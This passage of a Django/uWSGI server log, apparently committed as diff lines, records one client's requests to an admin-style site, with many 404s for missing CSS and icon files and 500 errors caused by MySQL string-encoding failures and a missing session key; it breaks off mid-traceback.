+[pid: 2069|app: 0|req: 560/681] 219.228.146.253 () {38 vars in 821 bytes} [Thu Jan 14 07:57:47 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 561/682] 219.228.146.253 () {38 vars in 819 bytes} [Thu Jan 14 07:57:47 2021] GET /static/css/animate.css => generated 3513 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 563/683] 219.228.146.253 () {40 vars in 937 bytes} [Thu Jan 14 07:58:15 2021] GET /announcement/? => generated 7421 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 564/684] 219.228.146.253 () {38 vars in 886 bytes} [Thu Jan 14 07:58:15 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 18 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 565/685] 219.228.146.253 () {38 vars in 898 bytes} [Thu Jan 14 07:58:15 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 566/686] 219.228.146.253 () {38 vars in 854 bytes} [Thu Jan 14 07:58:15 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 567/687] 219.228.146.253 () {38 vars in 890 bytes} [Thu Jan 14 07:58:15 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 568/688] 219.228.146.253 () {38 vars in 874 bytes} [Thu Jan 14 07:58:15 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 569/689] 219.228.146.253 () {38 vars in 874 bytes} [Thu Jan 14 07:58:15 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Internal Server Error: /announcement/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x81\\xAD\\xE5\\x96\\x9C...' for column 'a_title' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 477, in announcement
+ models.Announcement.objects.create(a_title=a_title, a_content=a_content)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x81\\xAD\\xE5\\x96\\x9C...' for column 'a_title' at row 1")
+[pid: 2069|app: 0|req: 569/690] 219.228.146.253 () {48 vars in 1031 bytes} [Thu Jan 14 07:58:15 2021] POST /announcement/ => generated 211445 bytes in 185 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 570/691] 219.228.146.253 () {38 vars in 930 bytes} [Thu Jan 14 07:58:15 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 571/692] 219.228.146.253 () {38 vars in 822 bytes} [Thu Jan 14 07:58:15 2021] GET /static/css/spinners.css => generated 3516 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 572/693] 219.228.146.253 () {38 vars in 820 bytes} [Thu Jan 14 07:58:15 2021] GET /static/css/animate.css => generated 3513 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 573/694] 219.228.146.253 () {40 vars in 933 bytes} [Thu Jan 14 07:58:22 2021] GET /admin-home/ => generated 6515 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 574/695] 219.228.146.253 () {38 vars in 886 bytes} [Thu Jan 14 07:58:22 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 575/696] 219.228.146.253 () {38 vars in 898 bytes} [Thu Jan 14 07:58:22 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 576/697] 219.228.146.253 () {38 vars in 874 bytes} [Thu Jan 14 07:58:22 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 577/698] 219.228.146.253 () {38 vars in 890 bytes} [Thu Jan 14 07:58:22 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 578/699] 219.228.146.253 () {38 vars in 874 bytes} [Thu Jan 14 07:58:22 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 579/700] 219.228.146.253 () {38 vars in 854 bytes} [Thu Jan 14 07:58:22 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 12 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 580/701] 219.228.146.253 () {38 vars in 930 bytes} [Thu Jan 14 07:58:22 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 581/702] 219.228.146.253 () {38 vars in 822 bytes} [Thu Jan 14 07:58:22 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 582/703] 219.228.146.253 () {38 vars in 820 bytes} [Thu Jan 14 07:58:22 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 583/704] 219.228.146.253 () {38 vars in 890 bytes} [Thu Jan 14 07:58:26 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 584/705] 219.228.146.253 () {38 vars in 820 bytes} [Thu Jan 14 07:58:26 2021] GET /static/css/animate.css => generated 3513 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 585/706] 219.228.146.253 () {40 vars in 937 bytes} [Thu Jan 14 07:58:27 2021] GET /announcement/ => generated 7421 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 586/707] 219.228.146.253 () {38 vars in 886 bytes} [Thu Jan 14 07:58:27 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 587/708] 219.228.146.253 () {38 vars in 898 bytes} [Thu Jan 14 07:58:27 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 588/709] 219.228.146.253 () {38 vars in 890 bytes} [Thu Jan 14 07:58:27 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 589/710] 219.228.146.253 () {38 vars in 854 bytes} [Thu Jan 14 07:58:27 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 590/711] 219.228.146.253 () {38 vars in 820 bytes} [Thu Jan 14 07:58:27 2021] GET /static/css/animate.css => generated 3513 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 591/712] 219.228.146.253 () {38 vars in 874 bytes} [Thu Jan 14 07:58:27 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 13 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 592/713] 219.228.146.253 () {38 vars in 874 bytes} [Thu Jan 14 07:58:27 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 593/714] 219.228.146.253 () {38 vars in 930 bytes} [Thu Jan 14 07:58:27 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 594/715] 219.228.146.253 () {38 vars in 822 bytes} [Thu Jan 14 07:58:27 2021] GET /static/css/spinners.css => generated 3516 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 595/716] 219.228.146.253 () {40 vars in 934 bytes} [Thu Jan 14 07:58:27 2021] GET /kind-manage/ => generated 6423 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 596/717] 219.228.146.253 () {38 vars in 886 bytes} [Thu Jan 14 07:58:27 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 597/718] 219.228.146.253 () {38 vars in 898 bytes} [Thu Jan 14 07:58:27 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 598/719] 219.228.146.253 () {38 vars in 890 bytes} [Thu Jan 14 07:58:27 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 599/720] 219.228.146.253 () {38 vars in 854 bytes} [Thu Jan 14 07:58:27 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 600/721] 219.228.146.253 () {38 vars in 874 bytes} [Thu Jan 14 07:58:27 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 601/722] 219.228.146.253 () {38 vars in 874 bytes} [Thu Jan 14 07:58:27 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 23 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 602/723] 219.228.146.253 () {38 vars in 930 bytes} [Thu Jan 14 07:58:28 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 603/724] 219.228.146.253 () {38 vars in 822 bytes} [Thu Jan 14 07:58:28 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 604/725] 219.228.146.253 () {38 vars in 820 bytes} [Thu Jan 14 07:58:28 2021] GET /static/css/animate.css => generated 3513 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 605/726] 219.228.146.253 () {40 vars in 935 bytes} [Thu Jan 14 07:58:34 2021] GET /announcement/ => generated 7421 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 606/727] 219.228.146.253 () {38 vars in 886 bytes} [Thu Jan 14 07:58:34 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 607/728] 219.228.146.253 () {38 vars in 898 bytes} [Thu Jan 14 07:58:34 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 608/729] 219.228.146.253 () {38 vars in 854 bytes} [Thu Jan 14 07:58:34 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 609/730] 219.228.146.253 () {38 vars in 874 bytes} [Thu Jan 14 07:58:34 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 610/731] 219.228.146.253 () {38 vars in 874 bytes} [Thu Jan 14 07:58:34 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 611/732] 219.228.146.253 () {38 vars in 890 bytes} [Thu Jan 14 07:58:34 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 17 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 612/733] 219.228.146.253 () {38 vars in 820 bytes} [Thu Jan 14 07:58:34 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 613/734] 219.228.146.253 () {38 vars in 822 bytes} [Thu Jan 14 07:58:34 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 614/735] 219.228.146.253 () {38 vars in 930 bytes} [Thu Jan 14 07:58:34 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 615/736] 219.228.146.253 () {40 vars in 934 bytes} [Thu Jan 14 07:58:36 2021] GET /kind-manage/ => generated 6423 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 616/737] 219.228.146.253 () {38 vars in 886 bytes} [Thu Jan 14 07:58:36 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 617/738] 219.228.146.253 () {38 vars in 898 bytes} [Thu Jan 14 07:58:36 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 618/739] 219.228.146.253 () {38 vars in 890 bytes} [Thu Jan 14 07:58:36 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 619/740] 219.228.146.253 () {38 vars in 854 bytes} [Thu Jan 14 07:58:36 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 620/741] 219.228.146.253 () {38 vars in 874 bytes} [Thu Jan 14 07:58:36 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 621/742] 219.228.146.253 () {38 vars in 930 bytes} [Thu Jan 14 07:58:36 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 16 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 622/743] 219.228.146.253 () {38 vars in 874 bytes} [Thu Jan 14 07:58:36 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 623/744] 219.228.146.253 () {38 vars in 822 bytes} [Thu Jan 14 07:58:36 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 624/745] 219.228.146.253 () {38 vars in 820 bytes} [Thu Jan 14 07:58:36 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 625/746] 219.228.146.253 () {38 vars in 861 bytes} [Thu Jan 14 07:58:44 2021] GET /home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 0)
+Internal Server Error: /home/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 38, in home
+ response['uid'] = request.session['uid']
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/contrib/sessions/backends/base.py", line 65, in __getitem__
+ return self._session[key]
+KeyError: 'uid'
+[pid: 2069|app: 0|req: 626/747] 219.228.146.253 () {38 vars in 863 bytes} [Thu Jan 14 07:58:44 2021] GET /home/ => generated 58497 bytes in 60 msecs (HTTP/1.1 500) 6 headers in 186 bytes (1 switches on core 0)
+Not Found: /all
+[pid: 2069|app: 0|req: 627/748] 219.228.146.253 () {38 vars in 859 bytes} [Thu Jan 14 07:58:53 2021] GET /all => generated 3456 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 628/749] 219.228.146.253 () {38 vars in 865 bytes} [Thu Jan 14 07:59:00 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
